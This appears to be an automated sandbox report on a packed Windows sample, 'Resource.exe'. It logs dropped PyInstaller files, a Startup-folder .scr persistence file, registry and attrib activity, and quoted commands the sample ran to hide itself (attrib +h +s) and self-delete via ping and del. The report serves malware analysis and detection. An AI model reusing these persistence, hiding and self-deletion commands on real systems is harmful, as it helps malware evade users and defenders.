              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9006
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x219f7
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1c9f2
              Source: Resource.exeStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60E5004 push rsp; retf 0_2_00007FF6E60E5005
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8188F28 push rsp; iretq 1_2_00007FF8A8188F29
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185C31 push r10; ret 1_2_00007FF8A8185C33
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8187630 push rbp; retf 1_2_00007FF8A8187649
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185CFE push rdx; ret 1_2_00007FF8A8185D01
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185EFA push r12; ret 1_2_00007FF8A8185F07
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8188405 push r10; retf 1_2_00007FF8A8188471
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185D06 push r12; ret 1_2_00007FF8A8185D08
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185E0F push rsp; ret 1_2_00007FF8A8185E17
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A818930D push rsp; ret 1_2_00007FF8A818930E
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A818685F push rsi; ret 1_2_00007FF8A8186896
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185E58 push rdi; iretd 1_2_00007FF8A8185E5A
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8188077 push r12; iretd 1_2_00007FF8A818808B
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185F76 push r8; ret 1_2_00007FF8A8185F83
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185F56 push r12; ret 1_2_00007FF8A8185F6E
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8187F53 push rbp; iretq 1_2_00007FF8A8187F54
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8188DA5 push rsp; retf 1_2_00007FF8A8188DA6
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185EAD push rsp; iretd 1_2_00007FF8A8185EAE
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A818767B push r12; ret 1_2_00007FF8A81876BF
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185CE5 push r8; ret 1_2_00007FF8A8185CEB
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185CE0 push r10; retf 1_2_00007FF8A8185CE2
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8187FEB push r12; ret 1_2_00007FF8A8188036
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185DF7 push r10; retf 1_2_00007FF8A8185DFA
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185EBC push rsi; ret 1_2_00007FF8A8185EBD
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A81882C4 push rdi; iretd 1_2_00007FF8A81882C6
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8185FB9 push r10; ret 1_2_00007FF8A8185FCC
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92F4541 push rcx; ret 1_2_00007FF8A92F4542
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E60A28 push rsp; iretd 1_2_00007FF8B7E60A29
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF8474ED2A5 pushad ; iretd 14_2_00007FF8474ED2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF8476000BD pushad ; iretd 14_2_00007FF8476000C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF84760862B push ebx; ret 14_2_00007FF8476086CA
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\Resource.exeProcess created: "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\Resource.exeProcess created: attrib.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scrJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A6EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6E60A6EF0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
